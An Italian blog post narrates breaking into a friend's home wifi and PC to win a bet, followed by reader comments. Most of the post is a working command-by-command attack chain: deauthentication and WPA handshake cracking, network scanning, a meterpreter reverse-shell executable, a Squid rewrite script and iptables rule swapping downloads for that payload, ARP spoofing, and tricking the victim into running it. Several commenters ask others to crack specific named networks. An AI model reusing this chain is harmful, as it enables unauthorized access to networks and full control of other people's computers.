domenica 10 aprile 2011

[Attacco Reale 1] Cronaca

salve a tutti, oggi pomeriggio ho vinto una birra ( tramite scommessa ) ? ecco qui la guida per vincere una birra :)
ecco come vincere una birra (=

durante un dibattito lui diceva che la sua password del wifi ( quella di default del router vodafone ) era inviolabile, e che anche uno si fosse connesso non avrebbe potuto creargli problemi perchè aveva windows SP 3 , quindi abbiamo fatto una scommessa che non era cosi, lui mi ha detto che potevo provare ad entrargli , e se ci fossi riuscito mi offriva una lime corona 
ok iniziamo:

allora prima di tutto

TOOL REQUIREMENT:

  • NMap ( Included on bt4 or bb )
  • Ettercap ( Included on bt4 or bb )
  • CoWPAtty ( coded by god )
  • Rainbow tables ( in questo caso della vodafone e quindi http://www.megaupload.com/?d=IGN8BQN3 )
  • Squid3 ( reposity debian-based )
  • Metasploit
  • Apache2
ok iniziamo:
per prima cosa ho attivato il monitor di aircrack
airmon-ng start wlan0
e poi ho scansionato fino a trovare il suo bssid , essid , channel, e un client ( il suo telefono nokia ) connesso tramite:
airodump-ng mon0
ok poi specifichiamo il range di airodump tramite:
airodump-ng --channel CHANNEL --bssid BSSID --write file mon0
e ho deauthenticato il suo cellulare dalla rete
aireplay-ng --deauth 1 -a BSSID -c CLIENT_DA_DEAUTHENTICARE_MAC mon0
ok ottenuto l'handshake WPA, diamo il file cap in pasto a coWPAtty (=
cowpatty -s ESSID -r file.cap -d vodafone
aspetto un pò di minuti , e tatata ecco la sua password! =)
bon connetttiamoci alla sua rete:
wpa_passphrase ESSID PASSWORD > amico.conf
wpa_supplicant -Dwext -iwlan0 -c /root/amico.conf
dhclient wlan0
ok sono connesso YO ,
ok iniziamo con il trovare tutti gli host connessi ^^
nmap -sP -T4 -n 192.168.1.1-255

trovo 4 target
192.168.1.1 # Router192.168.1.2 # (= io192.168.1.3 # Suo fisso192.168.1.4 # Suo nokia

ok allora per prima cosa, provo un metasploit autopwn =) che non darà nessun esito
/etc/init.d/postgresql start
  aprite da root il terminale psql e creo l'utente:
ALTER USER saeko WITH PASSWORD 'banana';
\q
ok aprite msfconsole
db_driver postgresql
db_connect saeko:"banana"@localhost/msf
db_nmap -sS -T4 -O 192.168.1.3
db_autopwn -x -e -R great

ma nulla....
allora proviamo una strategia stranaaa! (=
avviamo apache2, in /var/www
creiamo un file .htaccess con questo:
Options +FollowSymlinks
RewriteEngine on
RewriteRule ^(.*) exploit.exe
a cosa serve? semplice per reindirizzare tutte le pagine sul nostro eseguibile  exploit.exe che ora creeremo ^^ ok apriamo
 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 X > /var/www/exploit.exe
ora avviamo apache2:
/etc/init.d/apache2 start
ora ho modificato squid3 in maniera da permettere il suo funzionamento pure sulle reti locali, basta cercare localnet e decomentare la propria sottorete, e poi attivare tramite decomentazione di http_access allow localnet , e poi cerchiamo 3128, e aggiungiamo transparent (= e infondo mettiamo:
url_rewrite_program /percorso/prossimoscript.pl
il prossimo script formato cosi:

use IO::Handle;
use File::Basename;

$myip = "192.168.1.2";
while (<>) {
   chomp $_;
   if ($_ =~ /(.*\.exe)/i) {
      $file = basename( $1 );
      $new_url = "http://$myip/$file";
      print "$new_url\n";
   }
   else {
      print "$_\n";
   }
}

avviamolo
/etc/init.d/squid3 restart
ora settiamo iptables sul nostro pc
iptables -t nat -a PREROUTING --in-interface wlan0 -p tcp --destination-port 80 --jump REDIRECT --to-port 3128echo 1 > /proc/sys/net/ipv4/ip_forward
ok ora ho iniziato un attacco di tipo arp spoofing ( spiegato nel precedente articolo )

con:
ettercap -T -M arp -i wlan0 // /192.168.1.2/
ho avviato multi/handler da msfconsole
use exploit/multi/handlerset LHOST 0.0.0.0exploit -j
poi con una scusa gli ho fatto scaricare firefox 4, dello stile, comunque veramente una meraviglia sto firefox 4, lui : davvero va cosi bene? aspetta che lo provo! cosi è caduto nella mia trappola, ha scaricato un exe, che non era l'installer di firefox 4 ma il nostro exploit.exe

e di poi lifeissimple, aperta la sessione meterpreter, spari un getsystem e hai vinto...

Saeko

12 commenti:

  1. Certo che tutto sto lavoro per una birra.... :)

    RispondiElimina
  2. più che una birra dovevi prendere un nobel, e trovare un mega posto di lavoro.!!!

    RispondiElimina
  3. Una domandina...in Cowpatty al posto dell'ESSID posso inserire il valore Vodafone-11181909 (la mia linea)? Perché mi da errore...dice che non ha trovato l'ESSID nella hash che ho scaricato dalla rainbow table vodafone!
    Grazie,
    Laura

    RispondiElimina
  4. Ciao a tutti. Ho preso l'handshake con airodump ma quando lancio cowpatty, utilizzando le rainbow presenti all'url di megaupload, mi da errore. Ho provato quindi ad aprire il file delle rainbow con un editor ma non sembra essere un file di testo. Ma è compresso?

    RispondiElimina
  5. il link delle raimbow table non funziona più :( megaupload è stato chiuso, lo riesci a mettere su un altro host? o dire dove si trovano?

    RispondiElimina
  6. Ciao, volevo farti i complimenti per il tuo lavoro, con i computer ci sai fare dato il materiale che hai utilizzato..purtroppo io non ho granchè tempo nè probabilmente la capacità di farlo...Potrsti farmi un enorme favore??
    Trovarmi la wpa di questo vodafone..
    Vodafone-10469580
    Grazie mille in anticipo!! Aspetto notizie :)

    RispondiElimina
    Risposte
    1. 0.o?!
      Non funziona così!!
      Devi prima collegarti alla rete di cui vuoi scovare la pass per poi poterne provare milioni, prima di trovare quella corretta. Se bastasse l'ssid per trovare la password sarebbe un sistema di sicurezza a dir poco ridicolo...

      Elimina
  7. Mah, mi vengono dei dubbi. Le rainbow table funzionano solo per l'ssid usato per costruirle. Quindi se trovo un ssid comune (ad esempio dlink) mi procuro le rainbow table costruite per quel ssid e funzionano, ma non esiste che funzionino per un ssid casual come quello delle reti vodafone: il ssid è costruito aggiungendo otto numeri casuali alla parola vodafone. Forse è meglio che spieghi come avresti fatto a far funzionare le rainbow table con un ssid casuale.

    RispondiElimina
  8. bravo nonomai provato bizonia un po alinarsi ,io scoperto unpaio con wifislax(solo infostrada) poi con beini un wep poi su alicewpa.it. pero su back track o cercato molto ma niente

    RispondiElimina
  9. ditimi una coza come sipo eliminare il mac dal pc?

    RispondiElimina
  10. SSID:Vodafone-30538019

    MAC:90:35:6e:40:78:b8

    Qualcuno riesce a trovarmi la pass??

    RispondiElimina
  11. Come fai a fare un Bruteforce in qualche minuto anche se utilizi cowpatty (ti consiglio pyrit 6volte piu veloce il computing della gpu) cmq, per trovare una pass di tipo wpa/wpa almeno almeno 24 ore se siamo fortunati fino a una settimana se siamo sfigati pero, poi pass di 24 carattere, mission impossibile, conclusione sei un lammer di merda Auguri

    RispondiElimina